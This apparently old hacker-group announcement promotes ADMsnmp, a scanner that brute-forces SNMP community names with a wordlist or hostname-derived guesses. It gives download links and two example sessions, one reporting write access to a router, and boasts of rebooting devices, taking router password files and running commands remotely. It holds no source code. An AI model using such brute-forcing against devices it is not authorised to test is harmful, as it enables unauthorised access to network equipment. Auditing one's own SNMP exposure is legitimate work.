- ___ ______ _ _
- / | _ | / |
- | / | | | | | _/ |
- | |___| | | |_ / | | _/ |
- ..oO THE | --- | | / | | | | CreW Oo..
- ''' ''' ''''''' '''' ''''
- presents
- [ ADMsnmp v 0.1 ]
- * SNMP audit scanner *
- ftp://ADM.isp.at/ADM/ADMsnmp.0.1.tar.gz
- http://ADM.isp.at/ADM/ADMsmp.0.1.tar.gz
- http://el8.org/~antilove/ADMsnmp.0.1.tar.gz
- ADMsnmp is an snmpd audit scanner.
- Any of you know how weak and funny snmp is?
- You can obtain a great deal of usefull info like admin name's,
- you can play with the interface of the router, reboot the machine
- get the password file of the router (Ascend), or execute commands remoteley,
- anyway snmp is a BIG hole.
- ADMsnmp can brute force the snmp community name (with a wordfile) or
- make a wordfile list derived the hostname.
- ADMsnmp can report to you all valid community
- names found and inform you if writable access to the MIB has been attained.
- ADMsnmp is very easy to use and designed with speed in mind!
- here is an example session
- [root@ADM apps]# a.out 172.21.6.1 -wor snmp.passwd -sleep 1
- ADMsnmp vbeta 0.1 (c) The ADM crew
- ftp://ADM.isp.at/ADM/
- greets: !ADM, el8.org, ansia
- >>>>>>>>>>> get req name=root id = 2 >>>>>>>>>>>
- >>>>>>>>>>> get req name=public id = 5 >>>>>>>>>>>
- >>>>>>>>>>> get req name=private id = 8 >>>>>>>>>>>
- >>>>>>>>>>> get req name=write id = 11 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
- >>>>>>>>>>> get req name=admin id = 14 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>> get req name=proxy id = 17 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>> get req name=ascend id = 20 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>> get req name=cisco id = 23 >>>>>>>>>>>
- >>>>>>>>>>> get req name=router id = 26 >>>>>>>>>>>
- >>>>>>>>>>> get req name=shiva id = 29 >>>>>>>>>>>
- >>>>>>>>>>> get req name=all private id = 32 >>>>>>>>>>>
- >>>>>>>>>>> get req name= private id = 35 >>>>>>>>>>>
- >>>>>>>>>>> get req name=access id = 38 >>>>>>>>>>>
- >>>>>>>>>>> get req name=snmp id = 41 >>>>>>>>>>>
- <!ADM!> snmp check on router.dream.on.it <!ADM!>
- sys.sysName.0:router.dream.on.it
- name = private write access
- ADMsnmp inform's you if it has write access to the MIB with the community name private.
- snmpwalk <ip> <community name> and enjoy ;)
- another example ADMsnmp localhost -g (with the guessname option)
- ADMsnmp vbeta 0.1 (c) The ADM crew
- ftp://ADM.isp.at/ADM/
- greets: !ADM, el8.org, ansia
- >>>>>>>>>>> get req name=public id = 2 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 3 name = public ret =2 <<<<<<<<<<
- >>>>>>>>>>> get req name=private id = 5 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 4 name = public ret =2 <<<<<<<<<<
- >>>>>>>>>>> get req name=localhost95 id = 8 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 6 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>>> send setrequest id = 6 name = private >>>>>>>>
- >>>>>>>>>>> get req name=localhost96 id = 11 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 7 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>> get req name=localhost97 id = 14 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 9 name = localhost95 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost98 id = 17 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 10 name = localhost95 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost99 id = 20 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 137 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>> get req name=localhost0 id = 23 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 137 name = private ret =0 <<<<<<<<<<
- >>>>>>>>>>> get req name=localhost1 id = 26 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 12 name = localhost96 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost2 id = 29 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 13 name = localhost96 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost3 id = 32 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 15 name = localhost97 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost4 id = 35 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 16 name = localhost97 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost5 id = 38 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 18 name = localhost98 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost6 id = 41 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 19 name = localhost98 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost7 id = 44 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 21 name = localhost99 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost8 id = 47 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 22 name = localhost99 ret =2 <<<<<<<
- <<<
- >>>>>>>>>>> get req name=localhost9 id = 50 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 24 name = localhost0 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost10 id = 53 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 25 name = localhost0 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost00 id = 56 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 27 name = localhost1 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost01 id = 59 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 28 name = localhost1 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost02 id = 62 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 30 name = localhost2 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost03 id = 65 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 31 name = localhost2 ret =2 <<<<<<<<
- >>>>>>>>>>> get req name=localhost04 id = 68 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 33 name = localhost3 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost05 id = 71 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 34 name = localhost3 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost06 id = 74 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 36 name = localhost4 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost07 id = 77 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 37 name = localhost4 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost08 id = 80 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 39 name = localhost5 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost09 id = 83 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 40 name = localhost5 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=localhost10 id = 86 >>>>>>>>>>>
- <<<<<<<<<<< recv snmpd paket id = 42 name = localhost6 ret =2 <<<<<<<<
- <<
- >>>>>>>>>>> get req name=LOCALHOST95 id = 89 >>>>>>>>>>>
- etc..
- ADMsnmp is available on
- ftp://ADM.isp.at/ADM/ADMsnmp.0.1.tar.gz
- http://ADM.isp.at/ADM/ADMsmp.0.1.tar.gz
- http://el8.org/~antilove/ADMsnmp.0.1.tar.gz
- happy snmp walking :)
- The ADM Crew
- (thx to #as400 who help me to boot my as400 )